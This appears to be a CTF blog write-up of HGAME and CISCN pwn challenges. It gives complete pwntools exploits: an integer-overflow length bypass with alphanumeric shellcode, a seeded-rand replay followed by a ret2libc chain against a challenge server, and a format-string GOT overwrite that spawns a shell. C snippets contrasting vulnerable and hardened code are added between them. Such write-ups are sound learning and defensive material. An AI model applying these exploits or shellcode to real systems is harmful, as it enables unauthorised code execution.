Week 2


HGAME PWN

ezshellcode

There is an integer overflow: v4 is unsigned, so input -1 for the length and then supply a shellcode.

Find a shellcode and put it in.

Shellcode source: https://blog.csdn.net/mcmuyanga/article/details/114828207

exp:

from pwn import *

context(log_level='debug', arch='amd64', os='linux')
p = process('./ezshellcode')

# the length check is done on a signed value: -1 passes it and then becomes a huge read size
p.sendlineafter("of your shellcode:", b'-1')

# alphanumeric shellcode taken from the blog post linked above
shellcode = b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"

p.sendafter("input your shellcode:", shellcode)

p.interactive()
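The root cause in ezshellcode is a length that is parsed as a signed integer, bounds-checked in signed arithmetic, and then handed to read() as an unsigned size. The following C snippet is an added illustration (not the challenge binary's code and not the author's) that puts the vulnerable check next to a hardened parser; MAX_SHELLCODE_LEN and the function names are assumptions for the example, since the real limit is not on the page.

```c
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed upper bound for the shellcode buffer (the real binary's limit is not on the page). */
#define MAX_SHELLCODE_LEN 0x100

/* Vulnerable pattern: the length arrives as a signed int (e.g. from scanf("%d")),
 * only the upper bound is checked, and the value is then used as a size_t.
 * -1 passes the check and silently becomes SIZE_MAX when cast.
 * Returns the byte count that would be passed to read(); 0 means rejected. */
size_t vulnerable_len_check(int n)
{
    if (n > MAX_SHELLCODE_LEN)
        return 0;            /* rejected: only oversize values are caught */
    return (size_t)n;        /* -1 -> 0xffffffffffffffff on 64-bit */
}

/* Hardened parser: consume the whole decimal string with strtol, reject
 * overflow, missing digits and trailing junk, then check BOTH bounds while
 * the value is still signed, before the cast to size_t. */
bool parse_len(const char *s, size_t *out)
{
    char *end = NULL;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno == ERANGE)              /* did not fit in a long */
        return false;
    if (end == s)                     /* no digits at all, e.g. "abc" */
        return false;
    while (*end == '\n' || *end == '\r' || *end == ' ')
        end++;                        /* tolerate a trailing newline from the client */
    if (*end != '\0')                 /* anything else left over, e.g. "0x10" or "16abc" */
        return false;
    if (v <= 0 || v > MAX_SHELLCODE_LEN)   /* rejects -1, 0 and oversize */
        return false;
    *out = (size_t)v;
    return true;
}

/* Same contract as vulnerable_len_check (0 means rejected), built on parse_len. */
size_t hardened_len_check(const char *s)
{
    size_t n;
    return parse_len(s, &n) ? n : 0;
}
```

The important detail is that the lower bound is checked on the signed value; once the number has been cast to size_t, a "negative" length is indistinguishable from a very large one and no later comparison can catch it.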

Elden Random Challenge

After guessing 99 random numbers correctly there is a stack overflow in a read, and from there it is basic ret2libc.

Use ctypes to call the C library's functions: load it with cdll.LoadLibrary and replay the random numbers.

After entering the myread function, use the read function together with the dynamic library to write a ret2libc.

from pwn import *
from ctypes import *

context(log_level='debug', os='linux', arch='amd64', terminal=['tmux', 'splitw', '-h'])

p = remote('106.14.57.14', 30931)

elf = ELF('./vuln')
libc_c = cdll.LoadLibrary('./libc.so.6')   # ctypes handle, used to replay rand()

libc_c.srand(0)  # same seed as the binary, so rand() yields the same sequence

p.sendafter("thy name", b'a' * 0x12)

# replay the 99 "random" numbers
for i in range(0, 99):
    m = libc_c.rand() % 100 + 1
    # print(m)
    p.sendafter("guess the number:", p64(m))

libc = ELF('./libc.so.6')   # pwntools ELF object for symbol lookups
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

pop_rdi = 0x401423
ret = 0x40101A

read = 0x401250   # address of the read-based function, used to return for a second overflow

# stage 1: leak puts@libc, then return into the read function for a second overflow
payload = b'a' * 0x38
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(read)

p.sendafter("thy brilliant mind.", payload)

libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8, b'\x00')) - libc.sym['puts']

# print("libc_base=", hex(libc_base))

# stage 2: system("/bin/sh"); the extra ret keeps the stack 16-byte aligned
payload = b'a' * 0x38
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(libc_base + next(libc.search(b'/bin/sh')))
payload += p64(libc_base + libc.sym['system'])

p.sendline(payload)

p.interactive()
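The reason the ctypes trick works is that the challenge derives its "random" numbers from rand() after a constant srand(0), so anyone with the same libc can regenerate the whole sequence. The C code below is an added example (not the challenge's source and not the author's) that shows the deterministic shape from the defender's side and a hardened replacement that takes the secret from the OS CSPRNG; ROUNDS, /dev/urandom as the entropy source and the function names are assumptions for this example.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ROUNDS 99   /* the challenge asks for 99 correct guesses */

/* What the challenge effectively does: seed with a constant and draw rand() % 100 + 1.
 * Fills out[0..n-1] and returns n. Anyone with the same libc can replay this. */
int guesses_from_seed(unsigned seed, int *out, int n)
{
    srand(seed);
    for (int i = 0; i < n; i++)
        out[i] = rand() % 100 + 1;
    return n;
}

/* True if two independent runs with the same seed give the same sequence,
 * i.e. the whole game is a function of the seed. */
bool sequence_is_reproducible(unsigned seed)
{
    int a[ROUNDS], b[ROUNDS];
    guesses_from_seed(seed, a, ROUNDS);
    guesses_from_seed(seed, b, ROUNDS);
    return memcmp(a, b, sizeof a) == 0;
}

/* Hardened: draw the numbers from the kernel CSPRNG instead of rand().
 * /dev/urandom is used here for portability (getrandom(2) would do as well).
 * Rejection sampling removes the modulo bias of v % 100. Returns false on I/O failure. */
bool secret_guesses(int *out, int n)
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f)
        return false;
    const unsigned limit = (UINT_MAX / 100) * 100;   /* largest multiple of 100 that fits */
    for (int i = 0; i < n; i++) {
        unsigned v;
        do {
            unsigned char buf[4];
            if (fread(buf, 1, sizeof buf, f) != sizeof buf) {
                fclose(f);
                return false;
            }
            v = (unsigned)buf[0] | (unsigned)buf[1] << 8 |
                (unsigned)buf[2] << 16 | (unsigned)buf[3] << 24;
        } while (v >= limit);
        out[i] = (int)(v % 100) + 1;
    }
    fclose(f);
    return true;
}

/* Every value must lie in 1..100 for the game to be playable. */
bool all_in_range(const int *v, int n)
{
    for (int i = 0; i < n; i++)
        if (v[i] < 1 || v[i] > 100)
            return false;
    return true;
}

bool rand_guesses_in_range(unsigned seed)
{
    int g[ROUNDS];
    guesses_from_seed(seed, g, ROUNDS);
    return all_in_range(g, ROUNDS);
}

bool secret_guesses_in_range(void)
{
    int s[ROUNDS];
    return secret_guesses(s, ROUNDS) && all_in_range(s, ROUNDS);
}
```

Seeding rand() with time(NULL) instead of 0 only narrows the search to a few seeds around the connection time; the fix is to stop using rand() for anything a remote user must not be able to predict.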

[CISCN 2019 Southwest] PWN1

I couldn't get hgame's fmt challenge working, so I found another format string challenge.

First debug with gdb to work out the offset, which is 4; find printf's GOT entry and system's PLT entry, plus the main function.

Overwrite fini so the program runs a second time, and use fmtstr to swap system in.

from pwn import *
context(log_level='debug', arch='i386', os='linux')

p = process('./pwn')
elf = ELF('./pwn')
#rop = ROP('./pwn')

libc = elf.libc

p.recvuntil(b"your name?\n")

fini = 0x0804979C   # .fini_array entry: pointing it at main runs the program again
system_addr = elf.plt['system']
printf_addr = elf.got['printf']
main = elf.symbols['main']

# offset 4 found with gdb; write main into fini and system@plt over printf@got
payload = fmtstr_payload(4, {fini: main, printf_addr: system_addr}, write_size='short')  # write_size can be int, short or byte
print(payload)

p.sendline(payload)

p.recvuntil(b"What's your name?\n")

# second run: printf(name) now calls system(name)
p.sendline(b'/bin/sh\x00')
p.interactive()

Author: J1ton9
License: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit J1ton9 when reposting!